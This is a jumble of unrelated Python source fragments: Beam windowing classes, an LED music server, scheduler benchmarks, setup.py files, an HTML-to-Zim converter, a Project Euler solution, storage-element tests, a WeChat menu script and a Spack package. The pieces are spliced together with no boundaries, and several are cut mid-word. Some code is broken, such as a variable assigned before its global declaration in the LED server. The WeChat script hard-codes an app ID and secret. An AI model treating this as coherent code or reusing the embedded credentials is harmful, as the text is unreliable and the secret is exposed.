""" def __init__(self, value, timestamp): self.value = value self.timestamp = Timestamp.of(timestamp) def __eq__(self, other): return (type(self) == type(other) and self.value == other.value and self.timestamp == other.timestamp) def __hash__(self): return hash((self.value, self.timestamp)) def __ne__(self, other): return not self == other def __lt__(self, other): if type(self) != type(other): return type(self).__name__ < type(other).__name__ if self.value != other.value: return self.value < other.value return self.timestamp < other.timestamp class GlobalWindow(BoundedWindow): """The default window into which all data is placed (via GlobalWindows).""" _instance = None def __new__(cls): if cls._instance is None: cls._instance = super(GlobalWindow, cls).__new__(cls) return cls._instance def __init__(self): super(GlobalWindow, self).__init__(GlobalWindow._getTimestampFromProto()) self.start = MIN_TIMESTAMP def __repr__(self): return 'GlobalWindow' def __hash__(self): return hash(type(self)) def __eq__(self, other): # Global windows are always and only equal to each other. return self is other or type(self) is type(other) def __ne__(self, other): return not self == other @staticmethod def _getTimestampFromProto(): ts_millis = int( common_urns.constants.GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS.cons
to make it look better # here - probably want to avoid high values of # all because it will be white # (Emphasise/Reduce bass, mids, treble) l[i] *= float(equalizer[i]) l[i] = (l[i] * 256) - 1 # Use new val if > previous max if l[i] > self.max[i]: self.max[i] = l[i] else: # Otherwise, decrement max and use that # Gives colour falling effect self.max[i] -= self.fall[i] if self.max[i] < 0: self.max[i] = 0 l[i] = self.max[i] RGB = l lc.setRGB(RGB[0], RGB[1], RGB[2]) class AudioController: def __init__(self, leds): self.line_in = True self.leds = leds self.p = pyaudio.PyAudio() def more(self): try: # Return line in data return self.stream.read(CHUNK) except: print "line-in error" return 'ab' def analyse(self, data): # Convert to numpy array and filter data = np.fromstring(data, dtype=np.int16) # Convert int16 to float for dsp data = np.float32(data/32768.0) # Send to filter self.analyser.filter(data) self.analyser.change_leds() def record_setup(self): self.channels = 1 self.sample_rate = 44100 self.stream = self.p.open(format = pyaudio.paInt16, channels = self.channels, rate = self.sample_rate, input=True, frames_per_buffer=CHUNK) def loop(self): # Main processing loop # Do appropriate setup self.record_setup() self.analyser = FreqAnalyser(self.channels, self.sample_rate, self.leds) # Read the first block of audio data data = self.more() # While there is still audio left while (mode == "Music") or (mode == "Music1"): try: # Analyse data and change LEDs self.analyse(data) # Get more audio data data = self.more() except KeyboardInterrupt: break # Tidy up self.stream.close() self.p.terminate() ############################### other Effects functions ############################### class Effects: def Flasher(self): while (mode == "Flash"): random = self.Random_color() RGB = LedController().noWhite(random[0],random[1],random[2]) r = RGB[0] g = RGB[1] b = RGB[2] LedController().setRGB(r, g, b) time.sleep(tempo) def Strober(self): while (mode == "Strobe"): if tempo < 0: random 
= self.Random_color() LedController().setRGB(random[0],random[1],random[2]) self.wait_s(tempo) LedController().setRGB(0, 0, 0) self.wait_s(tempo) else: LedController().setRGB(255, 255, 255) self.wait_s(tempo) LedController().setRGB(0, 0, 0) self.wait_s(tempo) def Random_color(self): h = random.uniform(0, 100) / 100 s = random.uniform(95, 100) / 100 v = random.uniform(88, 100) / 100 return tuple(i * 255 for i in colorsys.hsv_to_rgb(h, s, v)) def wait_s(self,seconds): if seconds < 0: time.sleep((seconds) * (-1)) elif seconds >= 0: time.sleep(seconds) ###################################### Socket ###################################### class BrokerConnection(sockjs.tornado.SockJSConnection): clients = set() lc = LedController() rb = Rainbow() ef = Effects() ac = AudioController(lc) def on_open(self, info): # When new client comes in, will add it to the clients list self.clients.add(self) def on_message(self, message): # For every incoming message, broadcast it to all clients #self.broadcast(self.clients, message) # Set RGB color if not 'r' in locals(): r = 0 if not 'g' in locals(): g = 0 if not 'b' in locals(): b = 0 aRGB = self.message_analyser(message) if len(aRGB) == 3: r = float(aRGB[0]) g = float(aRGB[1]) b = float(aRGB[2]) if not mode == "nothing": mode = "nothing" time.sleep(0.1) self.lc.setRGB(r,g,b) if len(aRGB) == 2: global mode if not mode == "nothing": threadRunning = True else: threadRunning = False old_mode = mode mode = aRGB[0] setting = aRGB[1] if (mode == 'Rainbow'): global STEPS STEPS = float(setting) print "starting " + mode + "-service with " + str(STEPS) + " steps" if not mode == old_mode: start_new_thread(self.rb.fader, (r,g,b)) elif (mode == 'Music' or mode == 'Music1'): global MusicColor if mode == 'Music1': Mu
sicColor = setting.split('#') else: MusicColor = setting print "starting " + mode + "-service with " + str(MusicColor) + " color settings" if not mode == old_mode: start_new_thread(self.ac.loop, ()) elif (mode == "Flash"): global tempo tempo = float(setting) print "starting " + mode + "-service with
a tempo of " + str(tempo) if not mode == old_mode: start_new_thread(self.ef.Flasher, ()) elif (mode == "Strobe"): global tempo tempo = float(setting) print "starting " + mode + "-service with a tempo of " + str(tempo) if not mode == old_mode: start_new_thread(self.ef.Strober, ()) def message_analyser(self,msg): RGBcolor = [0,0,0] if msg.startswith('#'): RGBcolor = self.lc.hex_to_rgb(msg) elif msg.startswith('rgb'): RGBcolor = [float(i) for i in msg[4:-1].split(',')] elif msg.startswith('hsl'): hslString = msg[4:-1].split(',') for i in range(3): if '%' in hslString[i]: pos = hslString[i].index('%') hslString[i] = hslString[i][:pos] RGBcolor = self.lc.hsl_to_rgb([float(i) for i in hslString]) elif msg.count(',') == 1: RGBcolor = msg.split(',') elif msg.count(',') == 2 and not any(c.isalpha() for c in msg): RGBcolor = [float(i) for i in msg[4:-1].split(',')] else: RGBcolor = [0,0,0] print "Unsupported color model" return RGBcolor def on_close(self): # If client disconnects, remove him from the clients list self.clients.remove(self) def color_broadcaster(self,r,g,b): rgb = "rgb(" + str(r) + ", " + str(g) + ", " + str(b) + ")" self.send_message(rgb) if __name__ == '__main__': if len(sys.argv) > 1: options['immediate_flush'] = False # 1. Create SockJSRouter BrokerRouter = sockjs.tornado.SockJSRouter(BrokerConnection, '/rgb') # 2. Create Tornado web.Application app = web.Application(BrokerRouter.urls) # 3. Make application listen on port app.listen(port) # 4. Every 1 second dump current client count # ioloop.PeriodicCallback(BrokerConnection.dump_stats, 1000).start() # 5.
from time import time

from benchmark import Benchmark
from optimizer.optimizer import Optimizer
from optimizer.simulator import Simulator
from optimizer.evaluator import Evaluator
from extra.printer import pprint, BLUE


class EvaluatorPerf(Benchmark):
    """Base class for benchmarks timing Evaluator.evaluate()."""

    def __init__(self, plant, orderList, testNumber):
        Benchmark.__init__(self, plant, orderList, testNumber)
        self.prefix = "evaluator"

    def _makeOptimizer(self, mutationRange=10):
        # Build the small, fixed optimizer configuration shared by every
        # evaluator benchmark (previously duplicated in each bench()).
        optimizer = Optimizer(self.plant, self.orderList,
                              Simulator(self.plant), Evaluator(self.plant))
        optimizer.populationSize = 2
        optimizer.iterations = 2
        optimizer.indivMutationRate = 0.5
        optimizer.selectionRate = 0.5
        optimizer.mutationRange = mutationRange
        return optimizer

    def _timeEvaluation(self, schedules, plotX):
        # Time one evaluation of the best schedule and record it under the
        # x-coordinate `plotX`.
        evaluator = Evaluator(self.plant)
        t = time()
        evaluator.evaluate(schedules[0])
        t = time() - t
        self.addCairoPlotTime(t)
        self.addGnuPlotTime(plotX, t)


class EvaluatorMachinesPerf(EvaluatorPerf):
    """Scales the number of machines (and matching recipe steps)."""

    def __init__(self, plant, orderList, testNumber):
        EvaluatorPerf.__init__(self, plant, orderList, testNumber)
        self.testName = "NumberOfMachines"
        self.startValue = 1

    def bench(self):
        # Stash the full recipes and machine list, then re-grow them.
        recipes = []
        for o in self.orderList.orders:
            recipes.append(o.recipe.recipe[:])
            o.recipe.recipe = []
        machines = self.plant.machines[:]
        self.plant.machines = []

        i = self.startValue
        while i <= len(machines):
            pprint("PERF Number of machines = " + str(i), BLUE)
            self.plant.machines = machines[:i]
            for j, o in enumerate(self.orderList.orders):
                o.recipe.recipe = recipes[j][:i]
            schedules = self._makeOptimizer().run()
            self._timeEvaluation(schedules, i)
            i += 1


class EvaluatorOrdersPerf(EvaluatorPerf):
    """Scales the number of orders."""

    def __init__(self, plant, orderList, testNumber):
        EvaluatorPerf.__init__(self, plant, orderList, testNumber)
        self.testName = "NumberOfOrders"
        self.startValue = 2

    def bench(self):
        orders = self.orderList.orders[:]
        self.orderList.orders = []

        i = self.startValue
        while i <= len(orders):
            pprint("PERF Number of orders = " + str(i), BLUE)
            self.orderList.orders = orders[:i]
            schedules = self._makeOptimizer().run()
            self._timeEvaluation(schedules, i)
            i += 1


class EvaluatorLargeValuesPerf(EvaluatorPerf):
    """Scales deadlines and recipe times by a growing multiplier."""

    def __init__(self, plant, orderList, testNumber):
        EvaluatorPerf.__init__(self, plant, orderList, testNumber)
        self.testName = "LargeValuesMultiplier"
        # BUG FIX: bench() reads self.startValue, but unlike its sibling
        # classes this one never set it, raising AttributeError.  Starting
        # at 0 lets the `while i < 10` loop run its full range -- TODO
        # confirm the intended start value.
        self.startValue = 0

    def bench(self):
        val = 2
        i = self.startValue
        while i < 10:
            pprint("PERF Large Value = " + str(i * val), BLUE)
            # Deadlines and per-step durations grow geometrically.
            for o in self.orderList.orders:
                o.deadline *= val
                for r in o.recipe.recipe:
                    r[1] *= val
            schedules = self._makeOptimizer(mutationRange=500).run()
            self._timeEvaluation(schedules, (i + 1) * val)
            i += 1
# -*- coding: utf-8 -*-
import os

from setuptools import setup, find_packages

# Packaging metadata for the Flask-HTTP-Forwarding extension.
EXCLUDE_FROM_PACKAGES = ['test_*',]
VERSION = "1.1.0"
INSTALL_REQUIRES = ['requests', 'Flask']
TESTS_REQUIRE = ['nose', 'httpretty']

_METADATA = dict(
    name='Flask-HTTP-Forwarding',
    version=VERSION,
    url='http://www.github.com/casetext/flask-http-forwarding',
    author='Casetext, Inc.',
    author_email='casetext@casetext.com',
    description='Flask extension implementing HTTP forwarding',
    license='MIT',
    packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),
    include_package_data=True,
    install_requires=INSTALL_REQUIRES,
    tests_require=TESTS_REQUIRE,
    test_suite="nose.collector",
    platforms='any',
    classifiers=[
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Topic :: Internet :: WWW/HTTP :: HTTP Servers',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
)

setup(**_METADATA)
i": "//", "em": "//", "u": "__", "ins": "__", "mark": "__", "pre": "''", "code": "''", "blockquote": "", "strike": "~~", "del": "~~", "p": "", "div": "", "ol": "", "ul": "", "dl": "", "dt": "", "dd": "\t", "li": "", "table": "", "caption": "", "tr": "", "th": "|", "td": "|", "hr": "-----\n", "sup": "^{", "sub": "_{", "span": "", "figure": "", "figcaption": "\n", "abbr": "", "q": "", "time": ""} self.end = {"h1": " ======\n", "h2": " =====\n", "h3": " ====\n", "h4": " ===\n", "h5": " ==\n", "iframe": "]]", "strong": "**", "b": "**", "i": "//", "em": "//", "u": "__", "ins": "__", "mark": "__", "pre": "''", "code": "''", "blockquote": "", "strike": "~~", "del": "~~", "p": "\n", "div": "\n", "a": "]]", "ol": "\n", "ul": "\n", "dl": "\n", "dt": ":\n", "dd": "\n", "li": "", "table": "\n", "caption": "\n", "tr": "|\n", "th": "", "td": "", "sup": "}", "sub": "}", "figure": "\n", "figcaption": "\n"} self.list_type = "ol" self.item_no = 0 self.inside_p = False self.inside_pre = False self.pre_data = "" self.inside_blockquote = False self.inside_tag = "" #Indicate label on which we are self.start_tag = "" #Initial tag in case we have to delete it self.del_tag = "" self.tag_attrib = "" #Tag Attribute Value self.folder = None self.a_href = "" #Link of a tag self.inside_li = False self.list_level = -1 self.inside_iframe = False self.inside_span = False self.inside_dl = False self.inside_table = False def handle_starttag(self, tag, attrs): #If we are in a non-nestable tag we do nothing if self.inside_tag and not (self.inside_tag == "a" and tag == "img" and self.a_href) and not(self.inside_tag == "th" or self.inside_tag == "td" or self.inside_tag == "dt" or self.inside_tag == "dd") and not (tag == "a" and (self.inside_tag == "b" or self.inside_tag == "strong" or self.inside_tag == "i" or self.inside_tag == "em" or self.inside_tag == "u" or self.inside_tag == "ins" or self.inside_tag == "mark" or self.inside_tag == "strike" or self.inside_tag == "del") and 
self.zim_str.endswith(self.beg[self.inside_tag])): return if tag == "blockquote": self.inside_blockquote = True #If the tag a is in a non-nestable one, tag a prevails and the previous one is deleted. In block sentences it is not done if tag == "a" and self.inside_tag and ((self.inside_tag != "pre" and self.inside_tag != "code")): self.del_tag = self.inside_tag self.zim_str = self.zim_str[:len(self.zim_str)-len(self.start_tag)] #Initialize non-nestable tag if tag != "td" and tag != "dd" and self.beg.get(tag) or tag == "a" and not self.inside_tag: self.inside_tag = tag if (tag == "pre" or tag == "code"): #If pre in p self.inside_pre = True if tag in list(self.beg.keys()): #Add blank when tag not start line if self.zim_str.endswith(("\n", "(", "[", "\t", "\"", " ", "/", '\xa0')): blank = "" else: blank = " " self.zim_str += blank + self.beg[tag] self.start_tag = self.beg[tag] #Store start tag to delete it could be somewhere else if tag == "p": self.inside_p = True if self.inside_blockquote: self.zim_str += "\t" elif tag == "del": datetime = assoc("datetime", attrs) if datetime is not None: self.tag_attrib = " (" + datetime + ")" elif tag == "abbr": title = assoc("title", attrs) if title is not None: self.tag_attrib = " (" + title + ")" elif tag == "q": cite = assoc("cite", attrs) if cite is not None: self.tag_attrib = " ([[#|" + cite + "]])" self
.zim_str += '"' elif tag == "time": datetime = assoc("datetime", attrs) if datetime is not None: self.tag_attrib = " (" + datetime + ")" elif tag == "a": href = assoc("href", attrs) self.a_href
= href #ref of tag if href is None: href = "#" #Add blank when tag not start line if self.zim_str.endswith(("\n", "(", "[", "\t", "\"", " ", "/", '\xa0')): blank = "" else: blank = " " #If we are in a table we escape | if self.inside_table: pipe = "\|" else: pipe = "|" self.zim_str += blank + "[[{}".format(href) + pipe elif tag == "ol": #if we are in a definition list the tab is not put to the dd if self.inside_dl and self.zim_str.endswith("\t"): self.zim_str = self.zim_str[:len(self.zim_str)-len("\t")] #If it is not at the beginning of the line an enter is added if self.zim_str and not self.zim_str.endswith("\n"): self.zim_str += "\n" self.list_type = "ol" self.item_no = 0 self.list_level += 1 elif tag == "ul": #if we are in a definition list the tab is not put to the dd if self.inside_dl and self.zim_str.endswith("\t"): self.zim_str = self.zim_str[:len(self.zim_str)-len("\t")] #If it is not at the beginning of the line an enter is added if self.zim_str and not self.zim_str.endswith("\n"): self.zim_str += "\n" self.list_type = "ul" self.item_no = 0 self.list_level += 1 elif tag == "li": #If you are in a blockquote add tab if self.inside_blockquote: self.zim_str += "\t" #If tag li no close add enter if self.inside_li and (self.zim_str and not self.zim_str.endswith("\n")): self.zim_str += "\n" self.item_no += 1 self.zim_str += "\t" * self.list_level #Add level if self.list_type == "ol": self.zim_str += str(self.item_no) + ". " else: self.zim_str += "* " self.inside_li = True elif tag == "img": src = assoc("src", attrs) if src is None or src == "": src = "#" alt = assoc("alt", attrs) if alt is None: alt = "Image" if src != "#" and not self.inside_table: #If the image and the link match, only the image remains and the label is deleted if self.inside_tag == "a" and src == self.a_href: self.zim_str = self.zim_str[:len(self.zim_str)-len("[[" + self.a_href + "|")]
from setuptools import setup, find_packages

from helga_github_meta import __version__ as version

# Trove classifiers for the helga-github-meta IRC bot plugin.
_CLASSIFIERS = [
    'Development Status :: 4 - Beta',
    'Topic :: Communications :: Chat :: Internet Relay Chat',
    'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
    'Operating System :: OS Independent',
    'Programming Language :: Python',
    'Topic :: Software Development :: Libraries :: Python Modules',
    'Topic :: Communications :: Chat :: Internet Relay Chat',
]

setup(
    name='helga-github-meta',
    version=version,
    description=('Provide information for github related metadata'),
    classifiers=_CLASSIFIERS,
    keywords='irc bot github-meta urbandictionary urban dictionary ud',
    author='Jon Robison',
    author_email='narfman0@gmail.com',
    url='https://github.com/narfman0/helga-github-meta',
    license='LICENSE',
    packages=find_packages(),
    include_package_data=True,
    py_modules=['helga_github_meta.plugin'],
    zip_safe=True,
    install_requires=['helga', 'requests'],
    test_suite='tests',
    entry_points=dict(
        helga_plugins=[
            'github-meta = helga_github_meta.plugin:github_meta',
        ],
    ),
)
from django.contrib import admin

from library.models import Author, Book, Genre, Review

# Register every library model with the default admin site.
for _model in (Author, Book, Genre, Review):
    admin.site.register(_model)
# -*- coding: utf-8 -*-
"""
Largest product in a grid
https://projecteuler.net/problem=11
"""
GRID = """
08 02 22 97 38 15 00 40 00 75 04 05 07 78 52 12 50 77 91 08
49 49 99 40 17 81 18 57 60 87 17 40 98 43 69 48 04 56 62 00
81 49 31 73 55 79 14 29 93 71 40 67 53 88 30 03 49 13 36 65
52 70 95 23 04 60 11 42 69 24 68 56 01 32 56 71 37 02 36 91
22 31 16 71 51 67 63 89 41 92 36 54 22 40 40 28 66 33 13 80
24 47 32 60 99 03 45 02 44 75 33 53 78 36 84 20 35 17 12 50
32 98 81 28 64 23 67 10 26 38 40 67 59 54 70 66 18 38 64 70
67 26 20 68 02 62 12 20 95 63 94 39 63 08 40 91 66 49 94 21
24 55 58 05 66 73 99 26 97 17 78 78 96 83 14 88 34 89 63 72
21 36 23 09 75 00 76 44 20 45 35 14 00 61 33 97 34 31 33 95
78 17 53 28 22 75 31 67 15 94 03 80 04 62 16 14 09 53 56 92
16 39 05 42 96 35 31 47 55 58 88 24 00 17 54 24 36 29 85 57
86 56 00 48 35 71 89 07 05 44 44 37 44 60 21 58 51 54 17 58
19 80 81 68 05 94 47 69 28 73 92 13 86 52 17 77 04 89 55 40
04 52 08 83 97 35 99 16 07 97 57 32 16 26 26 79 33 27 98 66
88 36 68 87 57 62 20 72 03 46 33 67 46 55 12 32 63 93 53 69
04 42 16 73 38 25 39 11 24 94 72 18 08 46 29 32 40 62 76 36
20 69 36 41 72 30 23 88 34 62 99 69 82 67 59 85 74 04 36 16
20 73 35 29 78 31 90 01 74 31 49 71 48 86 81 16 23 57 05 54
01 70 54 71 83 51 54 69 16 92 33 48 61 43 52 01 89 19 67 48
"""


def adjacent_numbers_gen(grid):
    """Yield every run of four adjacent grid values.

    Runs are scanned rightwards, downwards, diagonally right+down and
    diagonally left+down; each run is produced exactly once as a 4-tuple.
    """
    # right
    for i, row in enumerate(grid):
        for j, a in enumerate(row):
            if j + 3 == len(row):
                break
            b, c, d = row[j + 1], row[j + 2], row[j + 3]
            yield a, b, c, d
    # down
    for i, row in enumerate(grid):
        if i + 3 == len(grid):
            break
        for j, a in enumerate(row):
            b, c, d = grid[i + 1][j], grid[i + 2][j], grid[i + 3][j]
            yield a, b, c, d
    # diagonally right + down
    for i, row in enumerate(grid):
        if i + 3 == len(grid):
            break
        for j, a in enumerate(row):
            if j + 3 == len(row):
                break
            b, c, d = grid[i + 1][j + 1], grid[i + 2][j + 2], grid[i + 3][j + 3]
            yield a, b, c, d
    # diagonally left + down
    for i, row in enumerate(grid):
        if i + 3 == len(grid):
            break
        for j, a in enumerate(row):
            if j - 3 < 0:
                continue
            b, c, d = grid[i + 1][j - 1], grid[i + 2][j - 2], grid[i + 3][j - 3]
            yield a, b, c, d


# Parse the textual grid into a list of rows of ints.
grid = [[int(x) for x in line.split()] for line in GRID.strip().split('\n')]

# GRID is a non-empty constant, so max() over the generator is safe.
max_product = max(a * b * c * d for a, b, c, d in adjacent_numbers_gen(grid))

# BUG FIX: `print max_product` was Python-2-only syntax and is a
# SyntaxError on Python 3; the call form works on both for one argument.
print(max_product)
from split_settings.tools import optional, include

include(
    'components/base.py',
    'components/pagination.py',
    optional('components/global.py'),

    # NOTE(review): the original comment referred to a 'product.py' that is
    # not in this include list -- presumably stale.  local.py must stay
    # last so machine-local settings can override (or first define) values,
    # e.g. entries of the DATABASE dictionary, left unset by the components
    # above -- confirm against the components themselves.
    'components/local.py',

    scope=globals()
)
cal path containing test files. There should be a folder called Workflow containing (the files can be simple textfiles) # FolderA # -FolderAA # --FileAA # -FileA # FolderB # -FileB # File1 # File2 # File3 def _mul(txt): """ Multiply the input text enough time so that we reach the expected file size """ return txt * (max(1, FILE_SIZE / len(txt))) class basicTest(unittest.TestCase): """ This performs all the test, and is just called for a specific plugin """ def setUp(self, pluginToTest): """ Put in place the local directory structure""" #gLogger.setLevel( 'DEBUG' ) self.LOCAL_PATH = tempfile.mkdtemp() self.storageName = STORAGE_NAME # create the local structure workPath = os.path.join(self.LOCAL_PATH, 'Workflow') os.mkdir(workPath) os.mkdir(os.path.join(workPath, 'FolderA')) with open(os.path.join(workPath, 'FolderA', 'FileA'), 'w') as f: f.write(_mul('FileA')) os.mkdir(os.path.join(workPath, 'FolderA', 'FolderAA')) with open(os.path.join(workPath, 'FolderA', 'FolderAA', 'FileAA'), 'w') as f: f.write(_mul('FileAA')) os.mkdir(os.path.join(workPath, 'FolderB')) with open(os.path.join(workPath, 'FolderB', 'FileB'), 'w') as f: f.write(_mul('FileB')) for fn in ["File1", "File2", "File3"]: with open(os.path.join(workPath, fn), 'w') as f: f.write(_mul(fn)) # When testing for a given plugin, this plugin might not be able to # write or read. In this case, we use this specific plugins # ONLY for the operations it is allowed to specSE = StorageElement(self.storageName, plugins=pluginToTest) genericSE = StorageElement(self.storageName) pluginProtocol = specSE.protocolOptions[0]['Protocol'] if pluginProtocol in specSE.localAccessProtocolList: print("Using specific SE with %s only for reading" % pluginToTest) self.readSE = specSE else: print("Plugin %s is not available for read. 
Use a generic SE" % pluginToTest) self.readSE = genericSE if pluginProtocol in specSE.localWriteProtocolList: print("Using specific SE with %s only for writing" % pluginToTest) self.writeSE = specSE else: print("Plugin %s is not available for write. Use a generic SE" % pluginToTest) self.writeSE = genericSE # Make sure we are testing the specific plugin at least for one self.assertTrue(self.readSE == specSE or self.writeSE == specSE, "Using only generic SE does not make sense!!") basicTest.clearDirectory(self) def tearDown(self): """ Remove the local tree and the remote files """ shutil.rmtree(self.LOCAL_PATH) self.clearDirectory() def clearDirectory(self): """ Removing target directory """ print("==================================================") print("==== Removing
the older Directory ================") workflow_folder = DESTINATION_PATH + '/Workflow' res = self.writeSE.removeDirectory(workflow_folder) if not res['OK']: print("basicTest.clearDirectory: Workflow folder maybe not empty") print("==================================================") def testWorkflow(self): """ This perform a complete workflow puting, removing, stating files and directories """
putDir = {os.path.join(DESTINATION_PATH, 'Workflow/FolderA'): os.path.join(self.LOCAL_PATH, 'Workflow/FolderA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB'): os.path.join(self.LOCAL_PATH, 'Workflow/FolderB')} createDir = [os.path.join(DESTINATION_PATH, 'Workflow/FolderA/FolderAA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderA/FolderABA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderA/FolderAAB') ] putFile = {os.path.join(DESTINATION_PATH, 'Workflow/FolderA/File1'): os.path.join(self.LOCAL_PATH, 'Workflow/File1'), os.path.join(DESTINATION_PATH, 'Workflow/FolderAA/File1'): os.path.join(self.LOCAL_PATH, 'Workflow/File1'), os.path.join(DESTINATION_PATH, 'Workflow/FolderBB/File2'): os.path.join(self.LOCAL_PATH, 'Workflow/File2'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB/File2'): os.path.join(self.LOCAL_PATH, 'Workflow/File2'), os.path.join(DESTINATION_PATH, 'Workflow/File3'): os.path.join(self.LOCAL_PATH, 'Workflow/File3')} isFile = {os.path.join(DESTINATION_PATH, 'Workflow/FolderA/File1'): os.path.join(self.LOCAL_PATH, 'Workflow/File1'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB/FileB'): os.path.join(self.LOCAL_PATH, 'Workflow/FolderB/FileB'), } listDir = [os.path.join(DESTINATION_PATH, 'Workflow'), os.path.join(DESTINATION_PATH, 'Workflow/FolderA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB') ] getDir = [os.path.join(DESTINATION_PATH, 'Workflow/FolderA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB') ] removeFile = [os.path.join(DESTINATION_PATH, 'Workflow/FolderA/File1')] rmdir = [os.path.join(DESTINATION_PATH, 'Workflow')] ##### Computing local adler and size ##### fileAdlers = {} fileSizes = {} for lfn, localFn in isFile.iteritems(): fileAdlers[lfn] = fileAdler(localFn) fileSizes[lfn] = getSize(localFn) ########## uploading directory ############# res = self.writeSE.putDirectory(putDir) self.assertEqual(res['OK'], True) # time.sleep(5) res = self.readSE.listDirectory(listDir) 
self.assertEqual(any(os.path.join(DESTINATION_PATH, 'Workflow/FolderA/FileA') in dictKey for dictKey in res['Value']['Successful'][os.path.join(DESTINATION_PATH, 'Workflow/FolderA')]['Files'].keys()), True) self.assertEqual(any(os.path.join(DESTINATION_PATH, 'Workflow/FolderB/FileB') in dictKey for dictKey in res['Value']['Successful'][os.path.join(DESTINATION_PATH, 'Workflow/FolderB')]['Files'].keys()), True) ########## createDir ############# res = self.writeSE.createDirectory(createDir) self.assertEqual(res['OK'], True) res = res['Value'] self.assertEqual(res['Successful'][createDir[0]], True) self.assertEqual(res['Successful'][createDir[1]], True) self.assertEqual(res['Successful'][createDir[2]], True) ######## putFile ######## res = self.writeSE.putFile(putFile) self.assertEqual(res['OK'], True) # time.sleep(5) res = self.readSE.isFile(isFile) self.assertEqual(res['OK'], True) self.assertTrue(all([x for x in res['Value']['Successful'].itervalues()])) # self.assertEqual( res['Value']['Successful'][isFile[0]], True ) # self.assertEqual( res['Value']['Successful'][isFile[1]], True ) ######## getMetadata ########### res = self.readSE.getFileMetadata(isFile) self.assertEqual(res['OK'], True) res = res['Value']['Successful'] self.assertEqual(any(path in resKey for path in isFile for resKey in res.keys()), True) # Checking that the checksums and sizes are correct for lfn in isFile: self.assertEqual(res[lfn]['Checksum'], fileAdlers[lfn]) self.assertEqual(res[lfn]['Size'], fileSizes[lfn]) ####### getDirectory ###### res = self.readSE.getDirectory(getDir, os.path.join(self.LOCAL_PATH, 'getDir'))
# -*- coding:utf-8 -*-
"""Provision the WeChat official-account custom menu via the WeChat API."""
import tornado.web
from wechatpy.parser import parse_message
from wechatpy import WeChatClient

TOKEN = '123456'
# NOTE(review): app credentials are hard-coded; move APPID/SECRET to
# configuration or environment variables so the secret is not committed
# to version control.
APPID = 'wxecb5391ec8a58227'
SECRET = 'fa32576b9daa6fd020c0104e6092196a'

# Bug fix: the original called `reload(sys)` and
# `sys.setdefaultencoding("utf-8")` at import time -- a Python-2-only hack
# that raises on Python 3 (no `reload` builtin, no `setdefaultencoding`)
# and masks real encoding bugs.  It has been removed; all string literals
# below are runtime data and remain byte-identical.


class BaseHandler(object):
    """Helper that creates the account's custom menu."""

    def get_client(self):
        """Create the three-button custom menu and return the API response.

        Returns whatever ``client.menu.create`` returns (the parsed JSON
        response from the WeChat menu/create endpoint).
        """
        client = WeChatClient(APPID, SECRET)
        a = client.menu.create({
            "button": [
                {
                    "type": "click",
                    "name": "阅读",
                    "key": "TODAY_READ"
                },
                {
                    "type": "click",
                    "name": "音乐",
                    "key": "TODAY_MUSIC"
                },
                {
                    "name": "时光",
                    "sub_button": [
                        {
                            "type": "click",
                            "name": "状态",
                            "key": "TODAY_STATUS"
                        },
                        {
                            "type": "view",
                            "name": "故事",
                            "url": "http://wufazhuce.com/"
                        },
                        {
                            "type": "view",
                            "name": "再见",
                            "url": "http://byetimes.com/"
                        },
                        {
                            "type": "view",
                            "name": "关于我们",
                            "url": "http://www.suyafei.com/"
                        }
                    ]
                }
            ],
        })
        return a


if __name__ == '__main__':
    client = BaseHandler().get_client()
    print(client)
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *


class Prodigal(MakefilePackage):
    """Fast, reliable protein-coding gene prediction for prokaryotic
       genomes."""

    homepage = "https://github.com/hyattpd/Prodigal"
    url = "https://github.com/hyattpd/Prodigal/archive/v2.6.3.tar.gz"

    version('2.6.3', '5181809fdb740e9a675cfdbb6c038466')

    def install(self, spec, prefix):
        # Prodigal's Makefile uses INSTALLDIR to select the install target.
        make('INSTALLDIR={0}'.format(self.prefix), 'install')

    def setup_environment(self, spack_env, run_env):
        # Bug fix: the original referenced the bare name `prefix`, which is
        # not defined in this scope outside of Spack's build environment;
        # the package's install prefix is `self.prefix`.  The binary is
        # installed at the prefix root (see INSTALLDIR above), so that is
        # what goes on PATH.
        run_env.prepend_path('PATH', self.prefix)
t.mark.parametrize('name, expected', convert_to_name_pair_list) def test_convert_to_name_pair(self, name, expected): """ Test if name pairing works """ assert self.test_class._convert_to_name_pair(name) == expected @pytest.mark.parametrize('author_elem, expected', [(dict(), None), ({'affiliation' : [{'name' : 'Porto'}]}, 'Porto'), ({'affiliation' : [{'name' : 'Porto'}, {'name' : 'Lissabon'}]}, 'Porto')]) def test_get_affiliation(self, author_elem, expected): """ Must return the first affiliation if any """ assert self.test_class._get_affiliation(author_elem) ==
expected def test_get_abstract(self, citeproc): """ Abstract must be set """ assert self.test_class._get_abstract(citeproc) == citeproc['abstract'] def test_get_abstact_missing(self, citeproc):
